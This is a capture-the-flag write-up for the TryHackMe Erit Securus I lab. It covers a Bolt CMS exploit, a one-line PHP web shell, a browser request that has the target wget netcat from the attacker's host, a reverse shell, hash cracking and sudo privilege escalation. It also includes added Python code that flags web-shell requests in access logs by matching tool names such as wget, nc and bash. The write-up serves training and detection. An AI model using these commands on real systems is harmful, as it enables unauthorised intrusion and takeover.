TryHackMe Erit Securus I room Write-up

Cursemagic
Jan 12, 2021

Hi everyone, I am Cursemagic. Today, I would like to share a write-up for the Erit Securus I room created by 4ndr34zz on the TryHackMe platform. Without further ado, let’s get started.

Link to TryHackMe Erit Securus I room: https://tryhackme.com/room/eritsecurusi

Task 2 Reconnaissance

Run Nmap.

There are two ports: port 22 and port 80.

Task 3 WebServer

What CMS is the website built of?

Ans: Bolt

Task 4 Exploit

Download the script provided by the room creator; we know it is written in Python.

For the password for the login page, I looked at the hint beside it and it gave me the answer.

Task 5 Reverse Shell

Run the command based on the following:

python3 <Path-to-Exploit> <URL> <Username> <Password>

Enter id into the terminal and we can get the following:

Run,

echo '<?php system($_GET["cmd"]);?>' > cmd.php

In this part, I changed the c to cmd, as I think it might be wrong (I am not sure of it), because the command provided afterwards seems odd. The creator created c.php, but the command below changed to cmd.php, which does not make any sense to me.

And we can see cmd.php is created.

After that, run command:

ln -s $(which nc) .

I set up a simple HTTP server using a Python command (either can be used):

python3 -m http.server <PORT>
python -m SimpleHTTPServer <PORT>

Then, this part took me a very long time to realize and understand. The command is not meant to be entered in the terminal but in the web browser’s URL bar. This is where I think the explanation does not go into detail, as it just stated “browse” in the task and I was not aware of it. I hope this will help some of the users who get stuck.

http://<machine-IP>/files/cmd.php?cmd=wget http://<LOCAL_IP>/nc

Next,

http://<MACHINE-IP>/files/cmd.php?cmd=chmod 755 nc

Set up our netcat.

Run nc on the target machine. (using browser)

We will see nc receive the connection. Then run the Python pty command to stabilize the shell.
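From the defender's side, the browser requests made in this task leave a clear trail in the web server's access log. The following Python is an added example, not part of the original write-up or the room's material; the log lines are constructed, and the Apache combined log format, the addresses, port 8000 and the token list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in Apache combined format (not taken from the room).
SAMPLE_LOG = """\
10.9.0.5 - - [12/Jan/2021:10:01:02 +0000] "GET /files/cmd.php?cmd=wget%20http://10.9.0.5:8000/nc HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.9.0.5 - - [12/Jan/2021:10:01:40 +0000] "GET /files/cmd.php?cmd=chmod+755+nc HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.9.0.7 - - [12/Jan/2021:10:02:11 +0000] "GET /files/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.9.0.7 - - [12/Jan/2021:10:03:00 +0000] "GET /search?cmd=help HTTP/1.1" 200 734 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Shell tooling seen in the steps above, plus a few common relatives (assumption).
SHELL_TOKENS = re.compile(r'\b(wget|curl|chmod|nc|ncat|bash|sh|python3?|id|whoami)\b')
# Upload directory used in this write-up; scripts should never execute from it.
UPLOAD_DIRS = ("/files/",)


def suspicious_requests(log_text):
    """Return (client, time, path, decoded_command) for likely web-shell hits."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, when, _method, target, _status = m.groups()
        url = urlsplit(target)
        in_upload_dir = url.path.startswith(UPLOAD_DIRS) and url.path.endswith(".php")
        if not in_upload_dir:
            continue
        # parse_qsl percent-decodes values and turns '+' into a space.
        for _name, value in parse_qsl(url.query, keep_blank_values=True):
            if SHELL_TOKENS.search(value):
                hits.append((client, when, url.path, value))
                break
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(*hit, sep=" | ")
```

Any PHP file answering requests from an upload directory deserves an alert on its own; configuring the web server not to execute scripts in that directory removes this step of the chain.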

Task 6 Priv esc

Search for the app/database directory, change into it, and run the command file bolt.db.

By using sqlite3, we read the database.

The following steps can be viewed from the task. For the user’s hash, we can run john to crack the hash.

Now let’s switch user.

Now locate the flag1.txt!

Task 7 Pivoting

Now, use ssh to log in to the server. (You must ssh from the wileec terminal.)

Run sudo -l

Go to GTFOBins and search zip. Now we can use the command line to exploit the shell.

Run TF=$(mktemp -u) before running the below ones.

Now we are jsmith!

Task 8 Privesc #2

Now, use the find command to locate the flag2.txt.

Task 9 Root

Now run sudo -l as jsmith.

Great. All.

And we are done! Finally!

This room is quite long and challenging at some points. But we can still manage to complete it!

Thanks for reading my write-up!

###########################################

Anyone willing to gift me free vouchers for any platform is greatly appreciated! XD

###########################################
